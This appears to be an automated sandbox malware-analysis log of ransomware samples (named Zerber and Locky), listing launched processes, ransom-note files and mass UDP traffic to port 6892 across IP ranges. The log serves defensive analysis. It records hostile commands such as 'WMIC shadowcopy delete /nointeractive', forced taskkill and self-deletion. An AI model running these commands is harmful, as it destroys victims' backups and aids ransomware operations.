C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\SysWOW64\regsvr32.exe"
C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe
"C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe"
C:\Windows\mbhvrmroopgk.exe
C:\Windows\mbhvrmroopgk.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\EuUHY.txt"
C:\Windows\System32\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\_README_6LU8_.hta"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im "Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe"
C:\Windows\system32\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\aTKJG.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\zXyGPPyF.txt"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
"C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\aEBdKflgy.txt"
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
"C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\XeveW.txt"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2688 CREDAT:275457 /prefetch:2
C:\Windows\System32\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\MBHVRM~1.EXE
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\-INSTRUCTION.html
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys3A62.tmp"
Network
| Country | Destination | Domain | Proto |
| LT | 194.165.17.13:6892 | udp | |
| LT | 194.165.17.14:6892 | udp | |
| LT | 194.165.17.15:6892 | udp | |
| LT | 194.165.17.16:6892 | udp | |
| LT | 194.165.17.17:6892 | udp | |
| LT | 194.165.17.18:6892 | udp | |
| LT | 194.165.17.19:6892 | udp | |
| LT | 194.165.17.20:6892 | udp | |
| LT | 194.165.17.21:6892 | udp | |
| LT | 194.165.17.22:6892 | udp | |
| LT | 194.165.17.23:6892 | udp | |
| LT | 194.165.17.24:6892 | udp | |
| LT | 194.165.17.25:6892 | udp | |
| LT | 194.165.17.26:6892 | udp | |
| LT | 194.165.17.27:6892 | udp | |
| LT | 194.165.17.28:6892 | udp | |
| LT | 194.165.17.29:6892 | udp | |
| LT | 194.165.17.30:6892 | udp | |
| LT | 194.165.17.31:6892 | udp | |
| LT | 194.165.17.32:6892 | udp | |
| LT | 194.165.17.33:6892 | udp | |
| LT | 194.165.17.34:6892 | udp | |
| LT | 194.165.17.35:6892 | udp | |
| LT | 194.165.17.36:6892 | udp | |
| LT | 194.165.17.37:6892 | udp | |
| LT | 194.165.17.38:6892 | udp | |
| LT | 194.165.17.39:6892 | udp | |
| LT | 194.165.17.40:6892 | udp | |
| LT | 194.165.17.41:6892 | udp | |
| LT | 194.165.17.42:6892 | udp | |
| LT | 194.165.17.43:6892 | udp | |
| LT | 194.165.17.44:6892 | udp | |
| LT | 194.165.17.45:6892 | udp | |
| LT | 194.165.17.46:6892 | udp | |
| LT | 194.165.17.47:6892 | udp | |
| LT | 194.165.17.48:6892 | udp | |
| LT | 194.165.17.49:6892 | udp | |
| LT | 194.165.17.50:6892 | udp | |
| LT | 194.165.17.51:6892 | udp | |
| LT | 194.165.17.52:6892 | udp | |
| LT | 194.165.17.53:6892 | udp | |
| LT | 194.165.17.54:6892 | udp | |
| LT | 194.165.17.55:6892 | udp | |
| LT | 194.165.17.56:6892 | udp | |
| LT | 194.165.17.57:6892 | udp | |
| LT | 194.165.17.58:6892 | udp | |
| LT | 194.165.17.59:6892 | udp | |
| LT | 194.165.17.60:6892 | udp | |
| LT | 194.165.17.61:6892 | udp | |
| LT | 194.165.17.62:6892 | udp | |
| LT | 194.165.17.63:6892 | udp | |
| LT | 194.165.17.64:6892 | udp | |
| LT | 194.165.17.65:6892 | udp | |
| LT | 194.165.17.66:6892 | udp | |
| LT | 194.165.17.67:6892 | udp | |
| LT | 194.165.17.68:6892 | udp | |
| LT | 194.165.17.69:6892 | udp | |
| LT | 194.165.17.70:6892 | udp | |
| LT | 194.165.17.71:6892 | udp | |
| LT | 194.165.17.72:6892 | udp | |
| LT | 194.165.17.73:6892 | udp | |
| LT | 194.165.17.74:6892 | udp | |
| LT | 194.165.17.75:6892 | udp | |
| LT | 194.165.17.76:6892 | udp | |
| LT | 194.165.17.77:6892 | udp | |
| LT | 194.165.17.78:6892 | udp | |
| LT | 194.165.17.79:6892 | udp | |
| LT | 194.165.17.80:6892 | udp | |
| LT | 194.165.17.81:6892 | udp | |
| LT | 194.165.17.82:6892 | udp | |
| LT | 194.165.17.83:6892 | udp | |
| LT | 194.165.17.84:6892 | udp | |
| LT | 194.165.17.85:6892 | udp | |
| LT | 194.165.17.86:6892 | udp | |
| LT | 194.165.17.87:6892 | udp | |
| LT | 194.165.17.88:6892 | udp | |
| LT | 194.165.17.89:6892 | udp | |
| LT | 194.165.17.90:6892 | udp | |
| LT | 194.165.17.91:6892 | udp | |
| LT | 194.165.17.92:6892 | udp | |
| LT | 194.165.17.93:6892 | udp | |
| LT | 194.165.17.94:6892 | udp | |
| LT | 194.165.17.95:6892 | udp | |
| LT | 194.165.17.96:6892 | udp | |
| LT | 194.165.17.97:6892 | udp | |
| LT | 194.165.17.98:6892 | udp | |
| LT | 194.165.17.99:6892 | udp | |
| LT | 194.165.17.100:6892 | udp | |
| LT | 194.165.17.101:6892 | udp | |
| LT | 194.165.17.102:6892 | udp | |
| LT | 194.165.17.103:6892 | udp | |
| LT | 194.165.17.104:6892 | udp | |
| LT | 194.165.17.105:6892 | udp | |
| LT | 194.165.17.106:6892 | udp | |
| LT | 194.165.17.107:6892 | udp | |
| LT | 194.165.17.108:6892 | udp | |
| LT | 194.165.17.109:6892 | udp | |
| LT | 194.165.17.110:6892 | udp | |
| LT | 194.165.17.111:6892 | udp | |
| LT | 194.165.17.112:6892 | udp | |
| LT | 194.165.17.113:6892 | udp | |
| LT | 194.165.17.114:6892 | udp | |
| LT | 194.165.17.115:6892 | udp | |
| LT | 194.165.17.116:6892 | udp | |
| LT | 194.165.17.117:6892 | udp | |
| LT | 194.165.17.118:6892 | udp | |
| LT | 194.165.17.119:6892 | udp | |
| LT | 194.165.17.120:6892 | udp | |
| LT | 194.165.17.121:6892 | udp | |
| LT | 194.165.17.122:6892 | udp | |
| LT | 194.165.17.123:6892 | udp | |
| LT | 194.165.17.124:6892 | udp | |
| LT | 194.165.17.125:6892 | udp | |
| LT | 194.165.17.126:6892 | udp | |
| LT | 194.165.17.127:6892 | udp | |
| LT | 194.165.17.128:6892 | udp | |
| LT | 194.165.17.129:6892 | udp | |
| LT | 194.165.17.130:6892 | udp | |
| LT | 194.165.17.131:6892 | udp | |
| LT | 194.165.17.132:6892 | udp | |
| LT | 194.165.17.133:6892 | udp | |
| LT | 194.165.17.134:6892 | udp | |
| LT | 194.165.17.135:6892 | udp | |
| LT | 194.165.17.136:6892 | udp | |
| LT | 194.165.17.137:6892 | udp | |
| LT | 194.165.17.138:6892 | udp | |
| LT | 194.165.17.139:6892 | udp | |
| LT | 194.165.17.140:6892 | udp | |
| LT | 194.165.17.141:6892 | udp | |
| LT | 194.165.17.142:6892 | udp | |
| LT | 194.165.17.143:6892 | udp | |
| LT | 194.165.17.144:6892 | udp | |
| LT | 194.165.17.145:6892 | udp | |
| LT | 194.165.17.146:6892 | udp | |
| LT | 194.165.17.147:6892 | udp | |
| LT | 194.165.17.148:6892 | udp | |
| LT | 194.165.17.149:6892 | udp | |
| LT | 194.165.17.150:6892 | udp | |
| LT | 194.165.17.151:6892 | udp | |
| LT | 194.165.17.152:6892 | udp | |
| LT | 194.165.17.153:6892 | udp | |
| LT | 194.165.17.154:6892 | udp | |
| LT | 194.165.17.155:6892 | udp | |
| LT | 194.165.17.156:6892 | udp | |
| LT | 194.165.17.157:6892 | udp | |
| LT | 194.165.17.158:6892 | udp | |
| LT | 194.165.17.159:6892 | udp | |
| LT | 194.165.17.160:6892 | udp | |
| LT | 194.165.17.161:6892 | udp | |
| LT | 194.165.17.162:6892 | udp | |
| LT | 194.165.17.163:6892 | udp | |
| LT | 194.165.17.164:6892 | udp | |
| LT | 194.165.17.165:6892 | udp | |
| LT | 194.165.17.166:6892 | udp | |
| LT | 194.165.17.167:6892 | udp | |
| LT | 194.165.17.168:6892 | udp | |
| LT | 194.165.17.169:6892 | udp | |
| LT | 194.165.17.170:6892 | udp | |
| LT | 194.165.17.171:6892 | udp | |
| LT | 194.165.17.172:6892 | udp | |
| LT | 194.165.17.173:6892 | udp | |
| LT | 194.165.17.174:6892 | udp | |
| LT | 194.165.17.175:6892 | udp | |
| LT | 194.165.17.176:6892 | udp | |
| LT | 194.165.17.177:6892 | udp | |
| LT | 194.165.17.178:6892 | udp | |
| LT | 194.165.17.179:6892 | udp | |
| LT | 194.165.17.180:6892 | udp | |
| LT | 194.165.17.181:6892 | udp | |
| LT | 194.165.17.182:6892 | udp | |
| LT | 194.165.17.183:6892 | udp | |
| LT | 194.165.17.184:6892 | udp | |
| LT | 194.165.17.185:6892 | udp | |
| LT | 194.165.17.186:6892 | udp | |
| LT | 194.165.17.187:6892 | udp | |
| LT | 194.165.17.188:6892 | udp | |
| LT | 194.165.17.189:6892 | udp | |
| LT | 194.165.17.190:6892 | udp | |
| LT | 194.165.17.191:6892 | udp | |
| LT | 194.165.17.192:6892 | udp | |
| LT | 194.165.17.193:6892 | udp | |
| LT | 194.165.17.194:6892 | udp | |
| LT | 194.165.17.195:6892 | udp | |
| LT | 194.165.17.196:6892 | udp | |
| LT | 194.165.17.197:6892 | udp | |
| LT | 194.165.17.198:6892 | udp | |
| LT | 194.165.17.199:6892 | udp | |
| LT | 194.165.17.200:6892 | udp | |
| LT | 194.165.17.201:6892 | udp | |
| LT | 194.165.17.202:6892 | udp | |
| LT | 194.165.17.203:6892 | udp | |
| LT | 194.165.17.204:6892 | udp | |
| LT | 194.165.17.205:6892 | udp | |
| LT | 194.165.17.206:6892 | udp | |
| LT | 194.165.17.207:6892 | udp | |
| LT | 194.165.17.208:6892 | udp | |
| LT | 194.165.17.209:6892 | udp | |
| LT | 194.165.17.210:6892 | udp | |
| LT | 194.165.17.211:6892 | udp | |
| LT | 194.165.17.212:6892 | udp | |
| LT | 194.165.17.213:6892 | udp | |
| LT | 194.165.17.214:6892 | udp | |
| LT | 194.165.17.215:6892 | udp | |
| LT | 194.165.17.216:6892 | udp | |
| LT | 194.165.17.217:6892 | udp | |
| LT | 194.165.17.218:6892 | udp | |
| LT | 194.165.17.219:6892 | udp | |
| LT | 194.165.17.220:6892 | udp | |
| LT | 194.165.17.221:6892 | udp | |
| LT | 194.165.17.222:6892 | udp | |
| LT | 194.165.17.223:6892 | udp | |
| LT | 194.165.17.224:6892 | udp | |
| LT | 194.165.17.225:6892 | udp | |
| LT | 194.165.17.226:6892 | udp | |
| LT | 194.165.17.227:6892 | udp | |
| LT | 194.165.17.228:6892 | udp | |
| LT | 194.165.17.229:6892 | udp | |
| LT | 194.165.17.230:6892 | udp | |
| LT | 194.165.17.231:6892 | udp | |
| LT | 194.165.17.232:6892 | udp | |
| LT | 194.165.17.233:6892 | udp | |
| LT | 194.165.17.234:6892 | udp | |
| LT | 194.165.17.235:6892 | udp | |
| LT | 194.165.17.236:6892 | udp | |
| LT | 194.165.17.237:6892 | udp | |
| LT | 194.165.17.238:6892 | udp | |
| LT | 194.165.17.239:6892 | udp | |
| LT | 194.165.17.240:6892 | udp | |
| LT | 194.165.17.241:6892 | udp | |
| LT | 194.165.17.242:6892 | udp | |
| LT | 194.165.17.243:6892 | udp | |
| LT | 194.165.17.244:6892 | udp | |
| LT | 194.165.17.245:6892 | udp | |
| LT | 194.165.17.246:6892 | udp | |
| LT | 194.165.17.247:6892 | udp | |
| LT | 194.165.17.248:6892 | udp | |
| LT | 194.165.17.249:6892 | udp | |
| LT | 194.165.17.250:6892 | udp | |
| LT | 194.165.17.251:6892 | udp | |
| LT | 194.165.17.252:6892 | udp | |
| LT | 194.165.17.253:6892 | udp | |
| LT | 194.165.17.254:6892 | udp | |
| US | 128.31.0.39:9101 | tcp | |
| N/A | 127.0.0.1:49375 | tcp | |
| LT | 194.165.17.255:6892 | udp | |
| SG | 76.73.17.194:9090 | tcp | |
| US | 8.8.8.8:53 | unstiff.pw | udp |
| US | 8.8.8.8:53 | collabvm.xyz | udp |
| RU | 95.213.195.123:80 | tcp | |
| US | 15.49.2.0:6892 | udp | |
| US | 15.49.2.1:6892 | udp | |
| US | 15.49.2.2:6892 | udp | |
| US | 15.49.2.3:6892 | udp | |
| US | 15.49.2.4:6892 | udp | |
| US | 15.49.2.5:6892 | udp | |
| US | 15.49.2.6:6892 | udp | |
| US | 15.49.2.7:6892 | udp | |
| US | 15.49.2.8:6892 | udp | |
| US | 15.49.2.9:6892 | udp | |
| US | 15.49.2.10:6892 | udp | |
| US | 15.49.2.11:6892 | udp | |
| US | 15.49.2.12:6892 | udp | |
| US | 15.49.2.13:6892 | udp | |
| US | 15.49.2.14:6892 | udp | |
| US | 15.49.2.15:6892 | udp | |
| US | 15.49.2.16:6892 | udp | |
| US | 15.49.2.17:6892 | udp | |
| US | 15.49.2.18:6892 | udp | |
| US | 15.49.2.19:6892 | udp | |
| US | 15.49.2.20:6892 | udp | |
| US | 15.49.2.21:6892 | udp | |
| US | 15.49.2.22:6892 | udp | |
| US | 15.49.2.23:6892 | udp | |
| US | 15.49.2.24:6892 | udp | |
| US | 15.49.2.25:6892 | udp | |
| US | 15.49.2.26:6892 | udp | |
| US | 15.49.2.27:6892 | udp | |
| US | 15.49.2.28:6892 | udp | |
| US | 15.49.2.29:6892 | udp | |
| US | 15.49.2.30:6892 | udp | |
| US | 15.49.2.31:6892 | udp | |
| JP | 122.1.13.0:6892 | udp | |
| JP | 122.1.13.1:6892 | udp | |
| JP | 122.1.13.2:6892 | udp | |
| JP | 122.1.13.3:6892 | udp | |
| JP | 122.1.13.4:6892 | udp | |
| JP | 122.1.13.5:6892 | udp | |
| JP | 122.1.13.6:6892 | udp | |
| JP | 122.1.13.7:6892 | udp | |
| JP | 122.1.13.8:6892 | udp | |
| JP | 122.1.13.9:6892 | udp | |
| JP | 122.1.13.10:6892 | udp | |
| JP | 122.1.13.11:6892 | udp | |
| JP | 122.1.13.12:6892 | udp | |
| JP | 122.1.13.13:6892 | udp | |
| JP | 122.1.13.14:6892 | udp | |
| JP | 122.1.13.15:6892 | udp | |
| JP | 122.1.13.16:6892 | udp | |
| JP | 122.1.13.17:6892 | udp | |
| JP | 122.1.13.18:6892 | udp | |
| JP | 122.1.13.19:6892 | udp | |
| JP | 122.1.13.20:6892 | udp | |
| JP | 122.1.13.21:6892 | udp | |
| JP | 122.1.13.22:6892 | udp | |
| JP | 122.1.13.23:6892 | udp | |
| JP | 122.1.13.24:6892 | udp | |
| JP | 122.1.13.25:6892 | udp | |
| JP | 122.1.13.26:6892 | udp | |
| JP | 122.1.13.27:6892 | udp | |
| JP | 122.1.13.28:6892 | udp | |
| JP | 122.1.13.29:6892 | udp | |
| JP | 122.1.13.30:6892 | udp | |
| JP | 122.1.13.31:6892 | udp | |
| LT | 194.165.16.0:6892 | udp | |
| LT | 194.165.16.1:6892 | udp | |
| LT | 194.165.16.2:6892 | udp | |
| LT | 194.165.16.3:6892 | udp | |
| LT | 194.165.16.4:6892 | udp | |
| LT | 194.165.16.5:6892 | udp | |
| LT | 194.165.16.6:6892 | udp | |
| LT | 194.165.16.7:6892 | udp | |
| LT | 194.165.16.8:6892 | udp | |
| LT | 194.165.16.9:6892 | udp | |
| LT | 194.165.16.10:6892 | udp | |
| LT | 194.165.16.11:6892 | udp | |
| LT | 194.165.16.12:6892 | udp | |
| LT | 194.165.16.13:6892 | udp | |
| LT | 194.165.16.14:6892 | udp | |
| LT | 194.165.16.15:6892 | udp | |
| LT | 194.165.16.16:6892 | udp | |
| LT | 194.165.16.17:6892 | udp | |
| LT | 194.165.16.18:6892 | udp | |
| LT | 194.165.16.19:6892 | udp | |
| LT | 194.165.16.20:6892 | udp | |
| LT | 194.165.16.21:6892 | udp | |
| LT | 194.165.16.22:6892 | udp | |
| LT | 194.165.16.23:6892 | udp | |
| LT | 194.165.16.24:6892 | udp | |
| LT | 194.165.16.25:6892 | udp | |
| LT | 194.165.16.26:6892 | udp | |
| LT | 194.165.16.27:6892 | udp | |
| LT | 194.165.16.28:6892 | udp | |
| LT | 194.165.16.29:6892 | udp | |
| LT | 194.165.16.30:6892 | udp | |
| LT | 194.165.16.31:6892 | udp | |
| LT | 194.165.16.32:6892 | udp | |
| LT | 194.165.16.33:6892 | udp | |
| LT | 194.165.16.34:6892 | udp | |
| LT | 194.165.16.35:6892 | udp | |
| LT | 194.165.16.36:6892 | udp | |
| LT | 194.165.16.37:6892 | udp | |
| LT | 194.165.16.38:6892 | udp | |
| LT | 194.165.16.39:6892 | udp | |
| LT | 194.165.16.40:6892 | udp | |
| LT | 194.165.16.41:6892 | udp | |
| LT | 194.165.16.42:6892 | udp | |
| LT | 194.165.16.43:6892 | udp | |
| LT | 194.165.16.44:6892 | udp | |
| LT | 194.165.16.45:6892 | udp | |
| LT | 194.165.16.46:6892 | udp | |
| LT | 194.165.16.47:6892 | udp | |
| LT | 194.165.16.48:6892 | udp | |
| LT | 194.165.16.49:6892 | udp | |
| LT | 194.165.16.50:6892 | udp | |
| LT | 194.165.16.51:6892 | udp | |
| LT | 194.165.16.52:6892 | udp | |
| LT | 194.165.16.53:6892 | udp | |
| LT | 194.165.16.54:6892 | udp | |
| LT | 194.165.16.55:6892 | udp | |
| LT | 194.165.16.56:6892 | udp | |
| LT | 194.165.16.57:6892 | udp | |
| LT | 194.165.16.58:6892 | udp | |
| LT | 194.165.16.59:6892 | udp | |
| LT | 194.165.16.60:6892 | udp | |
| LT | 194.165.16.61:6892 | udp | |
| LT | 194.165.16.62:6892 | udp | |
| LT | 194.165.16.63:6892 | udp | |
| LT | 194.165.16.64:6892 | udp | |
| LT | 194.165.16.65:6892 | udp | |
| LT | 194.165.16.66:6892 | udp | |
| LT | 194.165.16.67:6892 | udp | |
| LT | 194.165.16.68:6892 | udp | |
| LT | 194.165.16.69:6892 | udp | |
| LT | 194.165.16.70:6892 | udp | |
| LT | 194.165.16.71:6892 | udp | |
| LT | 194.165.16.72:6892 | udp | |
| LT | 194.165.16.73:6892 | udp | |
| LT | 194.165.16.74:6892 | udp | |
| LT | 194.165.16.75:6892 | udp | |
| LT | 194.165.16.76:6892 | udp | |
| LT | 194.165.16.77:6892 | udp | |
| LT | 194.165.16.78:6892 | udp | |
| LT | 194.165.16.79:6892 | udp | |
| LT | 194.165.16.80:6892 | udp | |
| LT | 194.165.16.81:6892 | udp | |
| LT | 194.165.16.82:6892 | udp | |
| LT | 194.165.16.83:6892 | udp | |
| LT | 194.165.16.84:6892 | udp | |
| LT | 194.165.16.85:6892 | udp | |
| LT | 194.165.16.86:6892 | udp | |
| LT | 194.165.16.87:6892 | udp | |
| LT | 194.165.16.88:6892 | udp | |
| LT | 194.165.16.89:6892 | udp | |
| LT | 194.165.16.90:6892 | udp | |
| LT | 194.165.16.91:6892 | udp | |
| LT | 194.165.16.92:6892 | udp | |
| LT | 194.165.16.93:6892 | udp | |
| LT | 194.165.16.94:6892 | udp | |
| LT | 194.165.16.95:6892 | udp | |
| LT | 194.165.16.96:6892 | udp | |
| LT | 194.165.16.97:6892 | udp | |
| LT | 194.165.16.98:6892 | udp | |
| LT | 194.165.16.99:6892 | udp | |
| LT | 194.165.16.100:6892 | udp | |
| LT | 194.165.16.101:6892 | udp | |
| LT | 194.165.16.102:6892 | udp | |
| LT | 194.165.16.103:6892 | udp | |
| LT | 194.165.16.104:6892 | udp | |
| LT | 194.165.16.105:6892 | udp | |
| LT | 194.165.16.106:6892 | udp | |
| LT | 194.165.16.107:6892 | udp | |
| LT | 194.165.16.108:6892 | udp | |
| LT | 194.165.16.109:6892 | udp | |
| LT | 194.165.16.110:6892 | udp | |
| LT | 194.165.16.111:6892 | udp | |
| LT | 194.165.16.112:6892 | udp | |
| LT | 194.165.16.113:6892 | udp | |
| LT | 194.165.16.114:6892 | udp | |
| LT | 194.165.16.115:6892 | udp | |
| LT | 194.165.16.116:6892 | udp | |
| LT | 194.165.16.117:6892 | udp | |
| LT | 194.165.16.118:6892 | udp | |
| LT | 194.165.16.119:6892 | udp | |
| LT | 194.165.16.120:6892 | udp | |
| LT | 194.165.16.121:6892 | udp | |
| LT | 194.165.16.122:6892 | udp | |
| LT | 194.165.16.123:6892 | udp | |
| LT | 194.165.16.124:6892 | udp | |
| LT | 194.165.16.125:6892 | udp | |
| LT | 194.165.16.126:6892 | udp | |
| LT | 194.165.16.127:6892 | udp | |
| LT | 194.165.16.128:6892 | udp | |
| LT | 194.165.16.129:6892 | udp | |
| LT | 194.165.16.130:6892 | udp | |
| LT | 194.165.16.131:6892 | udp | |
| LT | 194.165.16.132:6892 | udp | |
| LT | 194.165.16.133:6892 | udp | |
| LT | 194.165.16.134:6892 | udp | |
| LT | 194.165.16.135:6892 | udp | |
| LT | 194.165.16.136:6892 | udp | |
| LT | 194.165.16.137:6892 | udp | |
| LT | 194.165.16.138:6892 | udp | |
| LT | 194.165.16.139:6892 | udp | |
| LT | 194.165.16.140:6892 | udp | |
| LT | 194.165.16.141:6892 | udp | |
| LT | 194.165.16.142:6892 | udp | |
| LT | 194.165.16.143:6892 | udp | |
| LT | 194.165.16.144:6892 | udp | |
| LT | 194.165.16.145:6892 | udp | |
| LT | 194.165.16.146:6892 | udp | |
| LT | 194.165.16.147:6892 | udp | |
| LT | 194.165.16.148:6892 | udp | |
| LT | 194.165.16.149:6892 | udp | |
| LT | 194.165.16.150:6892 | udp | |
| LT | 194.165.16.151:6892 | udp | |
| LT | 194.165.16.152:6892 | udp | |
| LT | 194.165.16.153:6892 | udp | |
| LT | 194.165.16.154:6892 | udp | |
| LT | 194.165.16.155:6892 | udp | |
| LT | 194.165.16.156:6892 | udp | |
| LT | 194.165.16.157:6892 | udp | |
| LT | 194.165.16.158:6892 | udp | |
| LT | 194.165.16.159:6892 | udp | |
| LT | 194.165.16.160:6892 | udp | |
| LT | 194.165.16.161:6892 | udp | |
| LT | 194.165.16.162:6892 | udp | |
| LT | 194.165.16.163:6892 | udp | |
| LT | 194.165.16.164:6892 | udp | |
| LT | 194.165.16.165:6892 | udp | |
| LT | 194.165.16.166:6892 | udp | |
| LT | 194.165.16.167:6892 | udp | |
| LT | 194.165.16.168:6892 | udp | |
| LT | 194.165.16.169:6892 | udp | |
| LT | 194.165.16.170:6892 | udp | |
| LT | 194.165.16.171:6892 | udp | |
| LT | 194.165.16.172:6892 | udp | |
| LT | 194.165.16.173:6892 | udp | |
| LT | 194.165.16.174:6892 | udp | |
| LT | 194.165.16.175:6892 | udp | |
| LT | 194.165.16.176:6892 | udp | |
| LT | 194.165.16.177:6892 | udp | |
| LT | 194.165.16.178:6892 | udp | |
| LT | 194.165.16.179:6892 | udp | |
| LT | 194.165.16.180:6892 | udp | |
| LT | 194.165.16.181:6892 | udp | |
| LT | 194.165.16.182:6892 | udp | |
| LT | 194.165.16.183:6892 | udp | |
| LT | 194.165.16.184:6892 | udp | |
| LT | 194.165.16.185:6892 | udp | |
| LT | 194.165.16.186:6892 | udp | |
| LT | 194.165.16.187:6892 | udp | |
| LT | 194.165.16.188:6892 | udp | |
| LT | 194.165.16.189:6892 | udp | |
| LT | 194.165.16.190:6892 | udp | |
| LT | 194.165.16.191:6892 | udp | |
| LT | 194.165.16.192:6892 | udp | |
| LT | 194.165.16.193:6892 | udp | |
| LT | 194.165.16.194:6892 | udp | |
| LT | 194.165.16.195:6892 | udp | |
| LT | 194.165.16.196:6892 | udp | |
| LT | 194.165.16.197:6892 | udp | |
| LT | 194.165.16.198:6892 | udp | |
| LT | 194.165.16.199:6892 | udp | |
| LT | 194.165.16.200:6892 | udp | |
| LT | 194.165.16.201:6892 | udp | |
| LT | 194.165.16.202:6892 | udp | |
| LT | 194.165.16.203:6892 | udp | |
| LT | 194.165.16.204:6892 | udp | |
| LT | 194.165.16.205:6892 | udp | |
| LT | 194.165.16.206:6892 | udp | |
| LT | 194.165.16.207:6892 | udp | |
| LT | 194.165.16.208:6892 | udp | |
| LT | 194.165.16.209:6892 | udp | |
| LT | 194.165.16.210:6892 | udp | |
| LT | 194.165.16.211:6892 | udp | |
| LT | 194.165.16.212:6892 | udp | |
| LT | 194.165.16.213:6892 | udp | |
| LT | 194.165.16.214:6892 | udp | |
| LT | 194.165.16.215:6892 | udp | |
| LT | 194.165.16.216:6892 | udp | |
| LT | 194.165.16.217:6892 | udp | |
| LT | 194.165.16.218:6892 | udp | |
| LT | 194.165.16.219:6892 | udp | |
| LT | 194.165.16.220:6892 | udp | |
| LT | 194.165.16.221:6892 | udp | |
| LT | 194.165.16.222:6892 | udp | |
| LT | 194.165.16.223:6892 | udp | |
| LT | 194.165.16.224:6892 | udp | |
| LT | 194.165.16.225:6892 | udp | |
| LT | 194.165.16.226:6892 | udp | |
| LT | 194.165.16.227:6892 | udp | |
| LT | 194.165.16.228:6892 | udp | |
| LT | 194.165.16.229:6892 | udp | |
| LT | 194.165.16.230:6892 | udp | |
| LT | 194.165.16.231:6892 | udp | |
| LT | 194.165.16.232:6892 | udp | |
| LT | 194.165.16.233:6892 | udp | |
| LT | 194.165.16.234:6892 | udp | |
| LT | 194.165.16.235:6892 | udp | |
| LT | 194.165.16.236:6892 | udp | |
| LT | 194.165.16.237:6892 | udp | |
| LT | 194.165.16.238:6892 | udp | |
| LT | 194.165.16.239:6892 | udp | |
| LT | 194.165.16.240:6892 | udp | |
| LT | 194.165.16.241:6892 | udp | |
| LT | 194.165.16.242:6892 | udp | |
| LT | 194.165.16.243:6892 | udp | |
| LT | 194.165.16.244:6892 | udp | |
| LT | 194.165.16.245:6892 | udp | |
| LT | 194.165.16.246:6892 | udp | |
| LT | 194.165.16.247:6892 | udp | |
| LT | 194.165.16.248:6892 | udp | |
| LT | 194.165.16.249:6892 | udp | |
| LT | 194.165.16.250:6892 | udp | |
| LT | 194.165.16.251:6892 | udp | |
| LT | 194.165.16.252:6892 | udp | |
| LT | 194.165.16.253:6892 | udp | |
| LT | 194.165.16.254:6892 | udp | |
| US | 8.8.8.8:53 | www.wikitweak.com | udp |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| N/A | 127.0.0.1:49450 | tcp | |
| LT | 194.165.16.255:6892 | udp | |
| LT | 194.165.17.0:6892 | udp | |
| LT | 194.165.17.1:6892 | udp | |
| LT | 194.165.17.2:6892 | udp | |
| LT | 194.165.17.3:6892 | udp | |
| LT | 194.165.17.4:6892 | udp | |
| LT | 194.165.17.5:6892 | udp | |
| LT | 194.165.17.6:6892 | udp | |
| LT | 194.165.17.7:6892 | udp | |
| LT | 194.165.17.8:6892 | udp | |
| LT | 194.165.17.9:6892 | udp | |
| LT | 194.165.17.10:6892 | udp | |
| LT | 194.165.17.11:6892 | udp | |
